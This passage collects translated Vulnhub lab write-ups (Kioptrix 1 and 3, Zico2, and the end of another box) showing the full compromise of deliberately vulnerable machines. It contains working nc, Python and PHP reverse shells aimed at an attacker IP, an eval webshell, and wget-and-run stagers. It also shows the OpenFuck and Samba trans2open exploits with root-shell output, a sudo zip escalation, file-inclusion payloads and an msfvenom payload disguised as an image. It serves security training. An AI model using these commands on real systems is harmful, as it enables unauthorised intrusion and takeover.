src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4)通过nc反弹shell 执行命令<code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.5 4444 >/tmp/f</code>,需将命令进行url编码,然后在Burpsuit中发送:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5)Windows攻击机开启nc接收反弹shell成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6)为查找和传送文件方便,写入菜刀马<code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>菜刀连接成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9917' class='md-header-anchor '></a>提升权限</h2><ul><li>0x5 查找用户文件</li></ul><p>(1)查找每个用户文件,和浏览各目录文件,发现位于<code>/usr/local/bin/cleanup</code>文件,其权限是777,查看内容为:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>#!/bin/sh</code></p><p><code>rm -rf /var/log/apache2/*    # Clean those damn logs!!</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>这是一段清理Apache日志的脚本,需要root权限运行。</p><p>查看cleanup文件的权限为777,可以随意修改和执行,可以将文件内容改成一个反弹shell。</p><p>(2)在菜刀中直接修改cleanup文件为反弹shell命令:因在<code>/usr/local/lib/python2.7/</code>目录下安装有Python2.7,所以可以使用Python反弹shell</p><p><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.5",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) nc on Windows, waiting for the reverse shell, receives a root shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Read the flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9950' class='md-header-anchor '></a>Summary of Approach</h2><h3><a name='header-n9951' class='md-header-anchor '></a>Breakthroughs and Pitfalls</h3><p>1. When there is no obvious way in, try brute-forcing the passwords of known usernames; foreign password wordlists work better.</p><p>2. There are many ways to get a reverse shell on Linux; bash, nc, PHP, Python and others should all be tried.</p><p>3. Be familiar with the ways of getting a shell from the WordPress back end.</p><p>4. The author of the target hints that there are several methods, so there are certainly others; this write-up used two: brute-forcing an SSH user and going through WordPress.</p><p> </p><h1><a name='header-n9962' class='md-header-anchor '></a>Section 13 Kioptrix 1</h1><hr /><p>title: Vulnhub Penetration Testing Practice - Kioptrix 1
date: 2018-05-07 15:28:05
categories: Notes</p><h2><a name='header-n9965' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n9969' class='md-header-anchor '></a>Information Gathering</h2><p>Use <code>netdiscover</code> to find the target host's IP address.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 

 Currently scanning: 192.168.63.0/16   |   Screen View: Unique Hosts
 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      1      60  Xiaomi Communications Co L
 192.168.43.33   44:03:2c:68:d8:0f      1      60  Intel Corporate
 192.168.43.54   00:0c:29:7c:3a:16      1      60  VMware, Inc.
</pre><p>The scan shows that the target host's IP address is <code>192.168.43.54</code>.</p><p>Scan the IP's ports with nmap: <code>nmap -A 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS 192.168.43.54
 
Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.54
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
 
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.43.54
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds
</pre><p><code>443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)</code></p><p>The service on port 443 is <code>mod_ssl/2.8.4 OpenSSL/0.9.6b</code>.</p><p>Look up related vulnerabilities with <code>searchsploit mod_ssl</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~/Desktop# searchsploit mod_ssl
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
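</pre><p>The scan above and the searchsploit listing together describe a host whose services all belong to a generation of protocols a defender would flag on sight. As an added example that is not part of the original write-up, the following Python script reads nmap normal output of that form (a shortened copy of the scan above is embedded as constructed sample data) and turns the banners into findings: SSHv1, SSLv2 and export-grade ciphers, an expired certificate, the TRACE method and a mod_ssl older than the 2.8.7 cut-off visible in the searchsploit listing. The regexes, severities and the 2.8.7 threshold are this example's own assumptions.</p>

```python
import re
from datetime import datetime

# Constructed sample: a trimmed copy of the `nmap -A` normal output shown above.
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
"""

SCAN_DATE = datetime(2018, 5, 7)  # date of the scan above, used to judge certificate expiry
MODSSL_MIN = (2, 8, 7)  # assumed cut-off: searchsploit lists remote exploits for mod_ssl < 2.8.7

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
MODSSL_VER = re.compile(r"mod_ssl/(\d+\.\d+\.\d+)")


def _version_tuple(text):
    """'2.8.4' -> (2, 8, 4) so versions compare numerically, not lexically."""
    return tuple(int(x) for x in text.split("."))


def triage_nmap(report, scan_date):
    """Return (port, severity, finding) tuples for legacy-protocol indicators.

    NSE script lines ('|' / '|_') are attributed to the most recent port line.
    """
    findings = []
    port = None
    for raw in report.splitlines():
        m = PORT_LINE.match(raw)
        if m:
            port = int(m.group(1))
            v = MODSSL_VER.search(m.group(4))
            if v and _version_tuple(v.group(1)) < MODSSL_MIN:
                findings.append((port, "high", f"mod_ssl {v.group(1)} older than 2.8.7"))
            continue
        if port is None or not raw.startswith("|"):
            continue
        line = raw.lstrip("|_ ").strip()
        if "Server supports SSHv1" in line:
            findings.append((port, "high", "SSHv1 enabled"))
        elif line == "SSLv2 supported":
            findings.append((port, "high", "SSLv2 enabled"))
        elif line.startswith("SSL2_") and "EXPORT" in line:
            findings.append((port, "medium", f"export-grade cipher {line}"))
        elif line.startswith("Potentially risky methods:"):
            if "TRACE" in line.split(":", 1)[1].split():
                findings.append((port, "low", "HTTP TRACE method enabled"))
        elif line.startswith("Not valid after:"):
            expiry = datetime.fromisoformat(line.split(":", 1)[1].strip())
            if expiry < scan_date:
                findings.append((port, "medium", f"certificate expired {expiry.date()}"))
    return findings


def triage_sample():
    """Run the triage over the embedded sample with the scan's own date."""
    return triage_nmap(SAMPLE_NMAP, SCAN_DATE)


if __name__ == "__main__":
    for port, severity, finding in triage_sample():
        print(f"{port:>5}/tcp  {severity:<6}  {finding}")
```
<pre class="md-fences mock-cm md-end-block" lang="">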
 
</pre><p>The fourth entry's exploit script can be used here; download it from <code>exploit-db</code>.</p><h2><a name='header-n9987' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n9988' class='md-header-anchor '></a>OpenFuck Exploitation</h3><p>This is a remote overflow vulnerability. The downloaded exploit is quite old and needs a few changes:</p><ul><li>Compiling requires the <code>libssl-dev</code> library, specifically the 1.0 version: <code>apt-get install libssl1.0-dev</code></li><li>Add the headers <code>&lt;openssl/rc4.h&gt;</code> and <code>&lt;openssl/md5.h&gt;</code> to the exploit</li><li>Replace the URL after <code>wget</code> in the exploit with <code>http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</code></li><li>At line 961, change the declaration to <code>const unsigned char * p,* end;</code></li></ul><p>Then compile:</p><pre class="md-fences mock-cm md-end-block" lang="">gcc -o OpenFuck 764.c -lcrypto
</pre><p>Run <code>./OpenFuck</code> and choose the target id matching the system version.</p><p>Here 0x6b is chosen.</p><p>Run the command <code>./OpenFuck 0x6b 192.168.43.54</code>:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54
 
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
 
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80e0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--04:04:37--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--04:04:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
 
    0K ...                                                   100% @   3.74 MB/s
 
04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
 
[+] Attached to 6498
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
</pre><h3><a name='header-n10008' class='md-header-anchor '></a>Samba Exploitation</h3><p>The lab environment also has a Samba vulnerability.</p><p><code>enum4linux</code> is used here; it enumerates Windows systems and Samba services over SMB to pull a large amount of important information from the target, and its results may include user accounts, group accounts, shares, password policy and other sensitive details.</p><p>In my environment, however, it did not detect the Samba version.</p><p>The vulnerability is the <code>Samba trans2open overflow (Linux x86)</code>, a buffer overflow found in Samba versions 2.2.0 through 2.2.8.</p><p>It can also be found with <code>searchsploit</code>.</p><p>Here Metasploit is used directly.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf exploit(linux/samba/trans2open) > show options 
 
Module options (exploit/linux/samba/trans2open):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.43.54   yes       The target address
   RPORT  139              yes       The target port (TCP)
 
 
Payload options (linux/x86/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.54   no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
 
msf exploit(linux/samba/trans2open) > exploit
 
[*] Started bind handler
[*] 192.168.43.54:139 - Trying return address 0xbffffdfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffcfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffbfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffafc...
[*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400
 
id
uid=0(root) gid=0(root) groups=99(nobody)
</pre><h2><a name='header-n10023' class='md-header-anchor '></a>Summary</h2><p>Although this lab environment is old and some of these vulnerabilities are rarely seen in real engagements, working through the exploitation teaches the use of some <code>kali linux</code> tools and some practical thinking.</p><p> </p><h1><a name='header-n10028' class='md-header-anchor '></a>Section 14 Zico2</h1><hr /><p>title: Vulnhub Penetration Testing Practice - Zico2
date: 2018-05-05 22:30:35
categories: Notes</p><h2><a name='header-n10031' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n10035' class='md-header-anchor '></a>Vulnhub Lab Environment</h2><h3><a name='header-n10036' class='md-header-anchor '></a>Target Address</h3><p><a href='https://www.vulnhub.com/entry/zico2-1,210' target='_blank' class='url'>https://www.vulnhub.com/entry/zico2-1,210</a>/</p><h3><a name='header-n10039' class='md-header-anchor '></a>Practice Environment</h3><ul><li>Kali Linux</li><li>VirtualBox</li></ul><h2><a name='header-n10045' class='md-header-anchor '></a>Information Gathering</h2><p>Before gathering information we need the target's IP address. My target runs in VirtualBox in <code>Host-Only</code> network mode, and the target does not let you log in to the system to see its IP.</p><p>A Kali Linux tool, <code>netdiscover</code>, an ARP-based network scanner, is used here.</p><p>Simply run <code>netdiscover</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505223944.png' alt='' referrerPolicy='no-referrer' /></p><p>This returns two IP addresses; testing shows the correct one is <code>192.168.56.102</code>.</p><p>Next scan the ports with <code>nmap</code>:</p><p><code>nmap -A 192.168.56.102</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505224409.png' alt='' referrerPolicy='no-referrer' /></p><p>Port 80 is running a web server.</p><p>Visit the web service; at this point the usual scanners can be run against the site.</p><h2><a name='header-n10066' class='md-header-anchor '></a>Exploitation</h2><p>Browsing the pages briefly, I found a file inclusion vulnerability:</p><pre class="md-fences mock-cm md-end-block" lang="">view.php?page=tools.html
</pre><p>Try including <code>../../etc/passwd</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The inclusion works. Next, scan for directories. Because of the campus network, only <code>Host-Only</code> mode can be used for testing, so everything is done from <code>Kali</code>.</p><p>Use <code>dirb</code>, the Kali tool for brute-forcing directories, to scan the site.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_2.png' alt='' referrerPolicy='no-referrer' /></p><p>This finds a <code>dbadmin</code> directory.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_3.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_4.png' alt='' referrerPolicy='no-referrer' /></p><p>It hosts a server application called <code>phpLiteAdmin</code>, version <code>v1.9.3</code>.</p><p>Looking for known vulnerabilities in this version: it has a remote PHP code injection vulnerability.</p><p>The details can be found with a search engine, or with <code>Searchsploit</code>, Kali's command-line search tool for Exploit-DB.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_5.png' alt='' referrerPolicy='no-referrer' /></p><p>The vulnerability details show that exploiting this remote PHP code injection requires logging in.</p><p>Trying the default password <code>admin</code> logs straight in.</p><p>According to the <code>exploit-db</code> entry, we need to create a database and write a shell into it.</p><p>The shell can be caught with nc listening on a port, or with a PHP payload generated by msf and its listener.</p><p>Create the database as <code>exploit-db</code> describes: a database named <code>shell</code> with a <code>.php</code> extension.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_6.png' alt='' referrerPolicy='no-referrer' /></p><p>Add a table:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_7.png' alt='' referrerPolicy='no-referrer' /></p><p>Create a txt file locally under <code>/var/www/html</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">&lt;?php $sock=fsockopen("192.168.56.101",2333);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");?&gt;
</pre><p>Then start the Apache web server:</p><pre class="md-fences mock-cm md-end-block" lang="">service apache2 start
</pre><p>Then go back to the database, add a field of type <code>TEXT</code>, and write PHP code into it that downloads and executes the shell:</p><pre class="md-fences mock-cm md-end-block" lang="">&lt;?php system("wget 192.168.56.101/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?&gt;
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_8.png' alt='' referrerPolicy='no-referrer' /></p><p>To make the target download and execute this code, an HTTP request is needed.</p><p>This is where the local file inclusion found earlier comes in.</p><p>The path of the database we created can be found in the database listing:</p><pre class="md-fences mock-cm md-end-block" lang="">/usr/databases/shell.php
</pre><p>First listen with nc on the port set earlier, <code>2333</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_9.png' alt='' referrerPolicy='no-referrer' /></p><p>This gives us a reverse shell.</p><h2><a name='header-n10134' class='md-header-anchor '></a>Privilege Escalation</h2><p>After getting the reverse shell, inspecting the directories shows that /home/zico contains a <code>wordpress</code> directory, a common CMS.</p><p>Open its wp-config.php file.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_10.png' alt='' referrerPolicy='no-referrer' /></p><p>It holds login credentials for the user zico, which we can use over <code>ssh</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">ssh zico@192.168.56.102
</pre><p>Use <code>sudo -l</code> to see which commands the current user may and may not run:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_11.png' alt='' referrerPolicy='no-referrer' /></p><p>This shows that the current user <code>zico</code> can run <code>tar</code> and <code>zip</code> as root without a password.</p><p>Create an arbitrary file with <code>touch exploit</code> and compress it with <code>zip</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
</pre><ul><li>sudo: run with administrator privileges</li><li>-T: test the archive's integrity. This option makes zip run the next option, --unzip-command, which here is given an interactive Python shell</li></ul><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_12.png' alt='' referrerPolicy='no-referrer' /></p><p>This yields <code>root</code> privileges, and the <code>/root</code> directory can now be entered.</p><p><code>cat /root/flag.txt</code> gives the flag.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_13.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10169' class='md-header-anchor '></a>Summary</h2><ul><li>Vulnhub offers many different environments to practise on; this was my first complete penetration from start to finish and I learned a lot.</li><li>At the start of the write-up I used <code>netdiscover</code>, an ARP-based network scanner from <code>kali linux</code>. I remember a senior's account of an interview where he was asked why ARP is used to probe hosts on the internal network; he answered that it is quite stealthy and the results are more accurate. The main reason is that the traditional way to check whether a remote host is alive is the ICMP echo reply (ping), and many hosts block ICMP at the firewall to avoid scanners and so hide themselves on the network.</li><li>Two languages were used for interactive shells in this write-up, PHP and Python, following the <a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Reverse Shell Cheat Sheet</a>.</li><li>My hands-on privilege escalation experience is very limited. In this exercise I learned that one can create an arbitrary file with <code>touch exploit</code> and compress it with <code>zip</code>, which shows how little practical experience I have.</li><li>Finally, a word on the importance of English. Many foreign experts' blogs are very rich, and for a noob who barely scraped through CET-4 with 425 points, there is nothing for it but Baidu Translate.</li></ul><p> </p><h1><a name='header-n10180' class='md-header-anchor '></a>Section 15 Kioptrix 3</h1><hr /><p>title: Vulnhub Penetration Testing Practice - Kioptrix 3
date: 2018-05-08 20:01:26
categories: Notes</p><h2><a name='header-n10183' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n10187' class='md-header-anchor '></a>Information Gathering</h2><p>Again, use <code>netdiscover</code> to find the target host.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 
 
 Currently scanning: 192.168.194.0/16   |   Screen View: Unique Hosts          
                                                                                
 13 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 780              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      6     360  Xiaomi Communications Co Ltd
 192.168.43.33   44:03:2c:68:d8:0f      2     120  Intel Corporate             
 192.168.43.58   00:0c:29:b2:76:40      4     240  VMware, Inc.                
 192.168.43.158  00:0c:29:38:2d:6f      1      60  VMware, Inc. 
</pre><p>The target IP is <code>192.168.43.158</code>.</p><p>Scan the target's ports with nmap.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.43.158
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
 
</pre><p>The scan shows:</p><ul><li>22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)</li><li>80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)</li><li>OS details: Linux 2.6.9 - 2.6.33</li></ul><p> </p><p>Port 80 shows that the CMS is <code>Lotus CMS</code>.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_4.png' alt='' referrerPolicy='no-referrer' /></p><p>Scan the site's directories with <code>dirb</code> (御剑 works as well). This finds <code>phpMyAdmin</code>.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_5.png' alt='' referrerPolicy='no-referrer' /></p><p>The CMS back end is at <code>http://192.168.43.158/index.php?system=Admin</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10218' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n10220' class='md-header-anchor '></a>File Inclusion &amp; Back-End Upload</h3><p>Visit the web service on port 80.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The URL looks suspicious:</p><p><code>http://192.168.43.158/index.php?system=Blog</code></p><p>Try <code>system=../../../../../etc/passwd</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_2.png' alt='' referrerPolicy='no-referrer' /></p><p>That does not seem to work. Trying <code>%00.</code> truncation reads <code>/etc/passwd</code>:</p><p><code>http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_3.png' alt='' referrerPolicy='no-referrer' /></p><p>Combined with the back-end password dumped later with sqlmap, this gives a shell.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
</pre><p>The command above uses <code>msfvenom</code> to generate a raw PHP payload under a <code>.jpg</code> name. In the admin panel's photo upload, upload it (or replace an existing photo with it) and note the file name it is stored under. Start an msf handler on the listening port, then trigger the payload through the file inclusion. This step is of limited practical value on its own: it needs the absolute path of the uploaded file, which the web application does not disclose. Here the web root (<code>/home/www/kioptrix3.com</code>) is known only from the command-execution shell obtained further below.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.
